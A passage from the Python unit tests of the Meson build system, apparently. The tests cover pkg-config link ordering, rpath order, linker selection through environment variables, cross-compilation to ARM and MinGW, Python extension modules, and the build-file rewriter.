self.assertEqual("-r/usr/lib/libsomething.dll", str(stdo.decode('ascii')).strip())
@skipIfNoPkgconfig
def test_pkgconfig_link_order(self):
'''
Test that libraries are listed before their dependencies.
'''
testdir = os.path.join(self.unit_test_dir, '53 pkgconfig static link order')
self.init(testdir)
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = self.privatedir
stdo = subprocess.check_output(['pkg-config', '--libs', 'libsomething'], env=myenv)
deps = stdo.split()
self.assertTrue(deps.index(b'-lsomething') < deps.index(b'-ldependency'))
def test_deterministic_dep_order(self):
'''
Test that the dependencies are always listed in a deterministic order.
'''
testdir = os.path.join(self.unit_test_dir, '43 dep order')
self.init(testdir)
with open(os.path.join(self.builddir, 'build.ninja')) as bfile:
for line in bfile:
if 'build myexe:' in line or 'build myexe.exe:' in line:
self.assertIn('liblib1.a liblib2.a', line)
return
raise RuntimeError('Could not find the build rule')
def test_deterministic_rpath_order(self):
'''
Test that the rpaths are always listed in a deterministic order.
'''
if is_cygwin():
raise unittest.SkipTest('rpath are not used on Cygwin')
testdir = os.path.join(self.unit_test_dir, '42 rpath order')
self.init(testdir)
if is_osx():
rpathre = re.compile(r'-rpath,.*/subprojects/sub1.*-rpath,.*/subprojects/sub2')
else:
rpathre = re.compile(r'-rpath,\$\$ORIGIN/subprojects/sub1:\$\$ORIGIN/subprojects/sub2')
with open(os.path.join(self.builddir, 'build.ninja')) as bfile:
for line in bfile:
if '-rpath' in line:
self.assertRegex(line, rpathre)
return
raise RuntimeError('Could not find the rpath')
def test_override_with_exe_dep(self):
'''
Test that we produce the correct dependencies when a program is overridden with an executable.
'''
testdir = os.path.join(self.src_root, 'test cases', 'native', '9 override with exe')
self.init(testdir)
with open(os.path.join(self.builddir, 'build.ninja')) as bfile:
for line in bfile:
if 'main1.c:' in line or 'main2.c:' in line:
self.assertIn('| subprojects/sub/foobar', line)
@skipIfNoPkgconfig
def test_usage_external_library(self):
'''
Test that uninstalled usage of an external library (from the system or
PkgConfigDependency) works. On macOS, this workflow works out of the
box. On Linux, BSDs, Windows, etc, you need to set extra arguments such
as LD_LIBRARY_PATH, etc, so this test is skipped.
The system library is found with cc.find_library() and pkg-config deps.
'''
oldprefix = self.prefix
# Install external library so we can find it
testdir = os.path.join(self.unit_test_dir, '40 external, internal library rpath', 'external library')
# install into installdir without using DESTDIR
installdir = self.installdir
self.prefix = installdir
self.init(testdir)
self.prefix = oldprefix
self.build()
self.install(use_destdir=False)
## New builddir for the consumer
self.new_builddir()
env = {'LIBRARY_PATH': os.path.join(installdir, self.libdir),
'PKG_CONFIG_PATH': os.path.join(installdir, self.libdir, 'pkgconfig')}
testdir = os.path.join(self.unit_test_dir, '40 external, internal library rpath', 'built library')
# install into installdir without using DESTDIR
self.prefix = self.installdir
self.init(testdir, override_envvars=env)
self.prefix = oldprefix
self.build(override_envvars=env)
# test uninstalled
self.run_tests(override_envvars=env)
if not (is_osx() or is_linux()):
return
# test running after installation
self.install(use_destdir=False)
prog = os.path.join(self.installdir, 'bin', 'prog')
self._run([prog])
if not is_osx():
# Rest of the workflow only works on macOS
return
out = self._run(['otool', '-L', prog])
self.assertNotIn('@rpath', out)
## New builddir for testing that DESTDIR is not added to install_name
self.new_builddir()
# install into installdir with DESTDIR
self.init(testdir, override_envvars=env)
self.build(override_envvars=env)
# test running after installation
self.install(override_envvars=env)
prog = self.installdir + os.path.join(self.prefix, 'bin', 'prog')
lib = self.installdir + os.path.join(self.prefix, 'lib', 'libbar_built.dylib')
for f in prog, lib:
out = self._run(['otool', '-L', f])
# Ensure that the otool output does not contain self.installdir
self.assertNotRegex(out, self.installdir + '.*dylib ')
@skipIfNoPkgconfig
def test_usage_pkgconfig_prefixes(self):
'''
Build and install two external libraries, to different prefixes,
then build and install a client program that finds them via pkgconfig,
and verify the installed client program runs.
'''
oldinstalldir = self.installdir
# Build and install both external libraries without DESTDIR
val1dir = os.path.join(self.unit_test_dir, '76 pkgconfig prefixes', 'val1')
val1prefix = os.path.join(oldinstalldir, 'val1')
self.prefix = val1prefix
self.installdir = val1prefix
self.init(val1dir)
self.build()
self.install(use_destdir=False)
self.new_builddir()
env1 = {}
env1['PKG_CONFIG_PATH'] = os.path.join(val1prefix, self.libdir, 'pkgconfig')
val2dir = os.path.join(self.unit_test_dir, '76 pkgconfig prefixes', 'val2')
val2prefix = os.path.join(oldinstalldir, 'val2')
self.prefix = val2prefix
self.installdir = val2prefix
self.init(val2dir, override_envvars=env1)
self.build()
self.install(use_destdir=False)
self.new_builddir()
# Build, install, and run the client program
env2 = {}
env2['PKG_CONFIG_PATH'] = os.path.join(val2prefix, self.libdir, 'pkgconfig')
testdir = os.path.join(self.unit_test_dir, '76 pkgconfig prefixes', 'client')
testprefix = os.path.join(oldinstalldir, 'client')
self.prefix = testprefix
self.installdir = testprefix
self.init(testdir, override_envvars=env2)
self.build()
self.install(use_destdir=False)
prog = os.path.join(self.installdir, 'bin', 'client')
env3 = {}
if is_cygwin():
env3['PATH'] = os.path.join(val1prefix, 'bin') + \
os.pathsep + \
os.path.join(val2prefix, 'bin') + \
os.pathsep + os.environ['PATH']
out = self._run([prog], override_envvars=env3).strip()
# Expected output is val1 + val2 = 3
self.assertEqual(out, '3')
def install_subdir_invalid_symlinks(self, testdir, subdir_path):
'''
Test that installation of broken symlinks works fine.
https://github.com/mesonbuild/meson/issues/3914
'''
testdir = os.path.join(self.common_test_dir, testdir)
subdir = os.path.join(testdir, subdir_path)
with chdir(subdir):
# Can't distribute broken symlinks in the source tree because it breaks
# the creation of zipapps. Create it dynamically and run the test by
# hand.
src = '../../nonexistent.txt'
os.symlink(src, 'invalid-symlink.txt')
try:
self.init(testdir)
self.build()
self.install()
install_path = subdir_path.split(os.path.sep)[-1]
link = os.path.join(self.installdir, 'usr', 'share', install_path, 'invalid-symlink.txt')
self.assertTrue(os.path.islink(link), msg=link)
self.assertEqual(src, os.readlink(link))
self.assertFalse(os.path.isfile(link), msg=link)
finally:
os.remove(os.path.join(subdir, 'invalid-symlink.txt'))
def test_install_subdir_symlinks(self):
self.install_subdir_invalid_symlinks('60 install subdir', os.path.join('sub', 'sub1'))
def test_install_subdir_symlinks_with_default_umask(self):
self.install_subdir_invalid_symlinks('191 install_mode', 'sub2')
def test_install_subdir_symlinks_with_default_umask_and_mode(self):
self.install_subdir_invalid_symlinks('191 install_mode', 'sub1')
@skipIfNoPkgconfigDep('gmodule-2.0')
def test_ldflag_dedup(self):
testdir = os.path.join(self.unit_test_dir, '52 ldflagdedup')
if is_cygwin() or is_osx():
raise unittest.SkipTest('Not applicable on Cygwin or OSX.')
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
linker = cc.linker
if not linker.export_dynamic_args(env):
raise unittest.SkipTest('Not applicable for linkers without --export-dynamic')
self.init(testdir)
build_ninja = os.path.join(self.builddir, 'build.ninja')
max_count = 0
search_term = '-Wl,--export-dynamic'
with open(build_ninja, 'r', encoding='utf-8') as f:
for line in f:
max_count = max(max_count, line.count(search_term))
self.assertEqual(max_count, 1, 'Export dynamic incorrectly deduplicated.')
def test_compiler_libs_static_dedup(self):
testdir = os.path.join(self.unit_test_dir, '56 dedup compiler libs')
self.init(testdir)
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
lines = f.readlines()
for lib in ('-ldl', '-lm', '-lc', '-lrt'):
for line in lines:
if lib not in line:
continue
# Assert that
self.assertEqual(len(line.split(lib)), 2, msg=(lib, line))
@skipIfNoPkgconfig
def test_noncross_options(self):
# C_std defined in project options must be in effect also when native compiling.
testdir = os.path.join(self.unit_test_dir, '51 noncross options')
self.init(testdir, extra_args=['-Dpkg_config_path=' + testdir])
compdb = self.get_compdb()
self.assertEqual(len(compdb), 2)
self.assertRegex(compdb[0]['command'], '-std=c99')
self.assertRegex(compdb[1]['command'], '-std=c99')
self.build()
def test_identity_cross(self):
testdir = os.path.join(self.unit_test_dir, '61 identity cross')
nativefile = tempfile.NamedTemporaryFile(mode='w')
nativefile.write(textwrap.dedent('''\
[binaries]
c = ['{0}']
'''.format(os.path.join(testdir, 'build_wrapper.py'))))
nativefile.flush()
self.meson_native_file = nativefile.name
crossfile = tempfile.NamedTemporaryFile(mode='w')
crossfile.write(textwrap.dedent('''\
[binaries]
c = ['{0}']
'''.format(os.path.join(testdir, 'host_wrapper.py'))))
crossfile.flush()
self.meson_cross_file = crossfile.name
# TODO should someday be explicit about build platform only here
self.init(testdir)
def test_identity_cross_env(self):
testdir = os.path.join(self.unit_test_dir, '61 identity cross')
env = {
'CC_FOR_BUILD': '"' + os.path.join(testdir, 'build_wrapper.py') + '"',
}
crossfile = tempfile.NamedTemporaryFile(mode='w')
crossfile.write(textwrap.dedent('''\
[binaries]
c = ['{0}']
'''.format(os.path.join(testdir, 'host_wrapper.py'))))
crossfile.flush()
self.meson_cross_file = crossfile.name
# TODO should someday be explicit about build platform only here
self.init(testdir, override_envvars=env)
@skipIfNoPkgconfig
def test_static_link(self):
if is_cygwin():
raise unittest.SkipTest("Cygwin doesn't support LD_LIBRARY_PATH.")
# Build some libraries and install them
testdir = os.path.join(self.unit_test_dir, '68 static link/lib')
libdir = os.path.join(self.installdir, self.libdir)
oldprefix = self.prefix
self.prefix = self.installdir
self.init(testdir)
self.install(use_destdir=False)
# Test that installed libraries works
self.new_builddir()
self.prefix = oldprefix
meson_args = ['-Dc_link_args=-L{}'.format(libdir),
'--fatal-meson-warnings']
testdir = os.path.join(self.unit_test_dir, '68 static link')
env = {'PKG_CONFIG_LIBDIR': os.path.join(libdir, 'pkgconfig')}
self.init(testdir, extra_args=meson_args, override_envvars=env)
self.build()
self.run_tests()
def _check_ld(self, check: str, name: str, lang: str, expected: str) -> None:
if is_sunos():
raise unittest.SkipTest('Solaris currently cannot override the linker.')
if not shutil.which(check):
raise unittest.SkipTest('Could not find {}.'.format(check))
envvars = [mesonbuild.envconfig.ENV_VAR_PROG_MAP['{}_ld'.format(lang)]]
# Also test a deprecated variable if there is one.
if f'{lang}_ld' in mesonbuild.envconfig.DEPRECATED_ENV_PROG_MAP:
envvars.append(
mesonbuild.envconfig.DEPRECATED_ENV_PROG_MAP[f'{lang}_ld'])
for envvar in envvars:
with mock.patch.dict(os.environ, {envvar: name}):
env = get_fake_env()
comp = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
if isinstance(comp, (mesonbuild.compilers.AppleClangCCompiler,
mesonbuild.compilers.AppleClangCPPCompiler,
mesonbuild.compilers.AppleClangObjCCompiler,
mesonbuild.compilers.AppleClangObjCPPCompiler)):
raise unittest.SkipTest('AppleClang is currently only supported with ld64')
if lang != 'rust' and comp.use_linker_args('bfd') == []:
raise unittest.SkipTest(
'Compiler {} does not support using alternative linkers'.format(comp.id))
self.assertEqual(comp.linker.id, expected)
def test_ld_environment_variable_bfd(self):
self._check_ld('ld.bfd', 'bfd', 'c', 'ld.bfd')
def test_ld_environment_variable_gold(self):
self._check_ld('ld.gold', 'gold', 'c', 'ld.gold')
def test_ld_environment_variable_lld(self):
self._check_ld('ld.lld', 'lld', 'c', 'ld.lld')
@skip_if_not_language('rust')
@skipIfNoExecutable('ld.gold') # need an additional check here because _check_ld checks for gcc
def test_ld_environment_variable_rust(self):
self._check_ld('gcc', 'gcc -fuse-ld=gold', 'rust', 'ld.gold')
def test_ld_environment_variable_cpp(self):
self._check_ld('ld.gold', 'gold', 'cpp', 'ld.gold')
@skip_if_not_language('objc')
def test_ld_environment_variable_objc(self):
self._check_ld('ld.gold', 'gold', 'objc', 'ld.gold')
@skip_if_not_language('objcpp')
def test_ld_environment_variable_objcpp(self):
self._check_ld('ld.gold', 'gold', 'objcpp', 'ld.gold')
@skip_if_not_language('fortran')
def test_ld_environment_variable_fortran(self):
self._check_ld('ld.gold', 'gold', 'fortran', 'ld.gold')
@skip_if_not_language('d')
def test_ld_environment_variable_d(self):
# At least for me, ldc defaults to gold, and gdc defaults to bfd, so
# let's pick lld, which isn't the default for either (currently)
self._check_ld('ld.lld', 'lld', 'd', 'ld.lld')
def compute_sha256(self, filename):
with open(filename, 'rb') as f:
return hashlib.sha256(f.read()).hexdigest()
def test_wrap_with_file_url(self):
testdir = os.path.join(self.unit_test_dir, '74 wrap file url')
source_filename = os.path.join(testdir, 'subprojects', 'foo.tar.xz')
patch_filename = os.path.join(testdir, 'subprojects', 'foo-patch.tar.xz')
wrap_filename = os.path.join(testdir, 'subprojects', 'foo.wrap')
source_hash = self.compute_sha256(source_filename)
patch_hash = self.compute_sha256(patch_filename)
wrap = textwrap.dedent("""\
[wrap-file]
directory = foo
source_url = http://server.invalid/foo
source_fallback_url = file://{}
source_filename = foo.tar.xz
source_hash = {}
patch_url = http://server.invalid/foo
patch_fallback_url = file://{}
patch_filename = foo-patch.tar.xz
patch_hash = {}
""".format(source_filename, source_hash, patch_filename, patch_hash))
with open(wrap_filename, 'w') as f:
f.write(wrap)
self.init(testdir)
self.build()
self.run_tests()
windows_proof_rmtree(os.path.join(testdir, 'subprojects', 'packagecache'))
windows_proof_rmtree(os.path.join(testdir, 'subprojects', 'foo'))
os.unlink(wrap_filename)
def test_no_rpath_for_static(self):
testdir = os.path.join(self.common_test_dir, '5 linkstatic')
self.init(testdir)
self.build()
build_rpath = get_rpath(os.path.join(self.builddir, 'prog'))
self.assertIsNone(build_rpath)
def test_lookup_system_after_broken_fallback(self):
# Just to generate libfoo.pc so we can test system dependency lookup.
testdir = os.path.join(self.common_test_dir, '45 pkgconfig-gen')
self.init(testdir)
privatedir = self.privatedir
# Write test project where the first dependency() returns not-found
# because 'broken' subproject does not exit, but that should not prevent
# the 2nd dependency() to lookup on system.
self.new_builddir()
with tempfile.TemporaryDirectory() as d:
with open(os.path.join(d, 'meson.build'), 'w') as f:
f.write(textwrap.dedent('''\
project('test')
dependency('notfound', fallback: 'broken', required: false)
dependency('libfoo', fallback: 'broken', required: true)
'''))
self.init(d, override_envvars={'PKG_CONFIG_LIBDIR': privatedir})
def test_as_link_whole(self):
testdir = os.path.join(self.unit_test_dir, '78 as link whole')
self.init(testdir)
with open(os.path.join(self.privatedir, 'bar1.pc')) as f:
content = f.read()
self.assertIn('-lfoo', content)
with open(os.path.join(self.privatedir, 'bar2.pc')) as f:
content = f.read()
self.assertNotIn('-lfoo', content)
def test_prelinking(self):
# Prelinking currently only works on recently new GNU toolchains.
# Skip everything else. When support for other toolchains is added,
# remove limitations as necessary.
if is_osx():
raise unittest.SkipTest('Prelinking not supported on Darwin.')
if 'clang' in os.environ.get('CC', 'dummy'):
raise unittest.SkipTest('Prelinking not supported with Clang.')
gccver = subprocess.check_output(['cc', '--version'])
if b'7.5.0' in gccver:
raise unittest.SkipTest('GCC on Bionic is too old to be supported.')
testdir = os.path.join(self.unit_test_dir, '88 prelinking')
self.init(testdir)
self.build()
outlib = os.path.join(self.builddir, 'libprelinked.a')
ar = shutil.which('ar')
self.assertTrue(os.path.exists(outlib))
self.assertTrue(ar is not None)
p = subprocess.run([ar, 't', outlib],
stdout=subprocess.PIPE,
stderr=subprocess.DEVNULL,
universal_newlines=True, timeout=1)
obj_files = p.stdout.strip().split('\n')
self.assertEqual(len(obj_files), 1)
self.assertTrue(obj_files[0].endswith('-prelink.o'))
class BaseLinuxCrossTests(BasePlatformTests):
# Don't pass --libdir when cross-compiling. We have tests that
# check whether meson auto-detects it correctly.
libdir = None
def should_run_cross_arm_tests():
return shutil.which('arm-linux-gnueabihf-gcc') and not platform.machine().lower().startswith('arm')
@unittest.skipUnless(not is_windows() and should_run_cross_arm_tests(), "requires ability to cross compile to ARM")
class LinuxCrossArmTests(BaseLinuxCrossTests):
'''
Tests that cross-compilation to Linux/ARM works
'''
def setUp(self):
super().setUp()
src_root = os.path.dirname(__file__)
self.meson_cross_file = os.path.join(src_root, 'cross', 'ubuntu-armhf.txt')
def test_cflags_cross_environment_pollution(self):
'''
Test that the CFLAGS environment variable does not pollute the cross
environment. This can't be an ordinary test case because we need to
inspect the compiler database.
'''
testdir = os.path.join(self.common_test_dir, '3 static')
self.init(testdir, override_envvars={'CFLAGS': '-DBUILD_ENVIRONMENT_ONLY'})
compdb = self.get_compdb()
self.assertNotIn('-DBUILD_ENVIRONMENT_ONLY', compdb[0]['command'])
def test_cross_file_overrides_always_args(self):
'''
Test that $lang_args in cross files always override get_always_args().
Needed for overriding the default -D_FILE_OFFSET_BITS=64 on some
architectures such as some Android versions and Raspbian.
https://github.com/mesonbuild/meson/issues/3049
https://github.com/mesonbuild/meson/issues/3089
'''
testdir = os.path.join(self.unit_test_dir, '33 cross file overrides always args')
self.meson_cross_file = os.path.join(testdir, 'ubuntu-armhf-overrides.txt')
self.init(testdir)
compdb = self.get_compdb()
self.assertRegex(compdb[0]['command'], '-D_FILE_OFFSET_BITS=64.*-U_FILE_OFFSET_BITS')
self.build()
def test_cross_libdir(self):
# When cross compiling "libdir" should default to "lib"
# rather than "lib/x86_64-linux-gnu" or something like that.
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
for i in self.introspect('--buildoptions'):
if i['name'] == 'libdir':
self.assertEqual(i['value'], 'lib')
return
self.assertTrue(False, 'Option libdir not in introspect data.')
def test_cross_libdir_subproject(self):
# Guard against a regression where calling "subproject"
# would reset the value of libdir to its default value.
testdir = os.path.join(self.unit_test_dir, '77 subdir libdir')
self.init(testdir, extra_args=['--libdir=fuf'])
for i in self.introspect('--buildoptions'):
if i['name'] == 'libdir':
self.assertEqual(i['value'], 'fuf')
return
self.assertTrue(False, 'Libdir specified on command line gets reset.')
def test_std_remains(self):
# C_std defined in project options must be in effect also when cross compiling.
testdir = os.path.join(self.unit_test_dir, '51 noncross options')
self.init(testdir)
compdb = self.get_compdb()
self.assertRegex(compdb[0]['command'], '-std=c99')
self.build()
@skipIfNoPkgconfig
def test_pkg_config_option(self):
if not shutil.which('arm-linux-gnueabihf-pkg-config'):
raise unittest.SkipTest('Cross-pkgconfig not found.')
testdir = os.path.join(self.unit_test_dir, '58 pkg_config_path option')
self.init(testdir, extra_args=[
'-Dbuild.pkg_config_path=' + os.path.join(testdir, 'build_extra_path'),
'-Dpkg_config_path=' + os.path.join(testdir, 'host_extra_path'),
])
def test_run_native_test(self):
'''
https://github.com/mesonbuild/meson/issues/7997
check run native test in crossbuild without exe wrapper
'''
testdir = os.path.join(self.unit_test_dir, '89 run native test')
stamp_file = os.path.join(self.builddir, 'native_test_has_run.stamp')
self.init(testdir)
self.build()
self.assertPathDoesNotExist(stamp_file)
self.run_tests()
self.assertPathExists(stamp_file)
def should_run_cross_mingw_tests():
return shutil.which('x86_64-w64-mingw32-gcc') and not (is_windows() or is_cygwin())
@unittest.skipUnless(not is_windows() and should_run_cross_mingw_tests(), "requires ability to cross compile with MinGW")
class LinuxCrossMingwTests(BaseLinuxCrossTests):
'''
Tests that cross-compilation to Windows/MinGW works
'''
def setUp(self):
super().setUp()
src_root = os.path.dirname(__file__)
self.meson_cross_file = os.path.join(src_root, 'cross', 'linux-mingw-w64-64bit.txt')
def test_exe_wrapper_behaviour(self):
'''
Test that an exe wrapper that isn't found doesn't cause compiler sanity
checks and compiler checks to fail, but causes configure to fail if it
requires running a cross-built executable (custom_target or run_target)
and causes the tests to be skipped if they are run.
'''
testdir = os.path.join(self.unit_test_dir, '36 exe_wrapper behaviour')
# Configures, builds, and tests fine by default
self.init(testdir)
self.build()
self.run_tests()
self.wipe()
os.mkdir(self.builddir)
# Change cross file to use a non-existing exe_wrapper and it should fail
self.meson_cross_file = os.path.join(testdir, 'broken-cross.txt')
# Force tracebacks so we can detect them properly
env = {'MESON_FORCE_BACKTRACE': '1'}
error_message = "An exe_wrapper is needed but was not found. Please define one in cross file and check the command and/or add it to PATH."
with self.assertRaises(MesonException) as cm:
# Must run in-process or we'll get a generic CalledProcessError
self.init(testdir, extra_args='-Drun-target=false',
inprocess=True,
override_envvars=env)
self.assertEqual(str(cm.exception), error_message)
with self.assertRaises(MesonException) as cm:
# Must run in-process or we'll get a generic CalledProcessError
self.init(testdir, extra_args='-Dcustom-target=false',
inprocess=True,
override_envvars=env)
self.assertEqual(str(cm.exception), error_message)
self.init(testdir, extra_args=['-Dcustom-target=false', '-Drun-target=false'],
override_envvars=env)
self.build()
with self.assertRaises(MesonException) as cm:
# Must run in-process or we'll get a generic CalledProcessError
self.run_tests(inprocess=True, override_envvars=env)
self.assertEqual(str(cm.exception),
"The exe_wrapper defined in the cross file 'broken' was not found. Please check the command and/or add it to PATH.")
@skipIfNoPkgconfig
def test_cross_pkg_config_option(self):
testdir = os.path.join(self.unit_test_dir, '58 pkg_config_path option')
self.init(testdir, extra_args=[
'-Dbuild.pkg_config_path=' + os.path.join(testdir, 'build_extra_path'),
'-Dpkg_config_path=' + os.path.join(testdir, 'host_extra_path'),
])
class PythonTests(BasePlatformTests):
'''
Tests that verify compilation of python extension modules
'''
def test_versions(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Skipping python tests with {} backend'.format(self.backend.name))
testdir = os.path.join(self.src_root, 'test cases', 'unit', '39 python extmodule')
# No python version specified, this will use meson's python
self.init(testdir)
self.build()
self.run_tests()
self.wipe()
# When specifying a known name, (python2 / python3) the module
# will also try 'python' as a fallback and use it if the major
# version matches
try:
self.init(testdir, extra_args=['-Dpython=python2'])
self.build()
self.run_tests()
except unittest.SkipTest:
# python2 is not necessarily installed on the test machine,
# if it is not, or the python headers can't be found, the test
# will raise MESON_SKIP_TEST, we could check beforehand what version
# of python is available, but it's a bit of a chicken and egg situation,
# as that is the job of the module, so we just ask for forgiveness rather
# than permission.
pass
self.wipe()
for py in ('pypy', 'pypy3'):
try:
self.init(testdir, extra_args=['-Dpython=%s' % py])
except unittest.SkipTest:
# Same as above, pypy2 and pypy3 are not expected to be present
# on the test system, the test project only raises in these cases
continue
# We have a pypy, this is expected to work
self.build()
self.run_tests()
self.wipe()
# The test is configured to error out with MESON_SKIP_TEST
# in case it could not find python
with self.assertRaises(unittest.SkipTest):
self.init(testdir, extra_args=['-Dpython=not-python'])
self.wipe()
# While dir is an external command on both Windows and Linux,
# it certainly isn't python
with self.assertRaises(unittest.SkipTest):
self.init(testdir, extra_args=['-Dpython=dir'])
self.wipe()
class RewriterTests(BasePlatformTests):
def setUp(self):
super().setUp()
self.maxDiff = None
def prime(self, dirname):
copy_tree(os.path.join(self.rewrite_test_dir, dirname), self.builddir)
def rewrite_raw(self, directory, args):
if isinstance(args, str):
args = [args]
command = self.rewrite_command + ['--verbose', '--skip', '--sourcedir', directory] + args
p = subprocess.run(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
universal_newlines=True, timeout=60)
print('STDOUT:')
print(p.stdout)
print('STDERR:')
print(p.stderr)
if p.returncode != 0:
if 'MESON_SKIP_TEST' in p.stdout:
raise unittest.SkipTest('Project requested skipping.')
raise subprocess.CalledProcessError(p.returncode, command, output=p.stdout)
if not p.stderr:
return {}
return json.loads(p.stderr)
def rewrite(self, directory, args):
if isinstance(args, str):
args = [args]
return self.rewrite_raw(directory, ['command'] + args)
def test_target_source_list(self):
self.prime('1 basic')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileA.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp', 'fileA.cpp']},
}
}
self.assertDictEqual(out, expected)
def test_target_add_sources(self):
self.prime('1 basic')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp', 'a7.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['a7.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['a5.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['a5.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['a3.cpp', 'main.cpp', 'a7.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp', 'a4.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
}
}
self.assertDictEqual(out, expected)
# Check the written file
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(out, expected)
def test_target_add_sources_abs(self):
self.prime('1 basic')
abs_src = [os.path.join(self.builddir, x) for x in ['a1.cpp', 'a2.cpp', 'a6.cpp']]
add = json.dumps([{"type": "target", "target": "trivialprog1", "operation": "src_add", "sources": abs_src}])
inf = json.dumps([{"type": "target", "target": "trivialprog1", "operation": "info"}])
self.rewrite(self.builddir, add)
out = self.rewrite(self.builddir, inf)
expected = {'target': {'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']}}}
self.assertDictEqual(out, expected)
def test_target_remove_sources(self):
self.prime('1 basic')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'rmSrc.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileC.cpp', 'main.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp']},
}
}
self.assertDictEqual(out, expected)
# Check the written file
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(out, expected)
def test_target_subdir(self):
self.prime('2 subdirs')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json'))
expected = {'name': 'something', 'sources': ['first.c', 'second.c', 'third.c']}
self.assertDictEqual(list(out['target'].values())[0], expected)
# Check the written file
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(list(out['target'].values())[0], expected)
def test_target_remove(self):
self.prime('1 basic')
self.rewrite(self.builddir, os.path.join(self.builddir, 'rmTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'target': {
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']},
}
}
self.assertDictEqual(out, expected)
def test_tatrget_add(self):
self.prime('1 basic')
self.rewrite(self.builddir, os.path.join(self.builddir, 'addTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileA.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']},
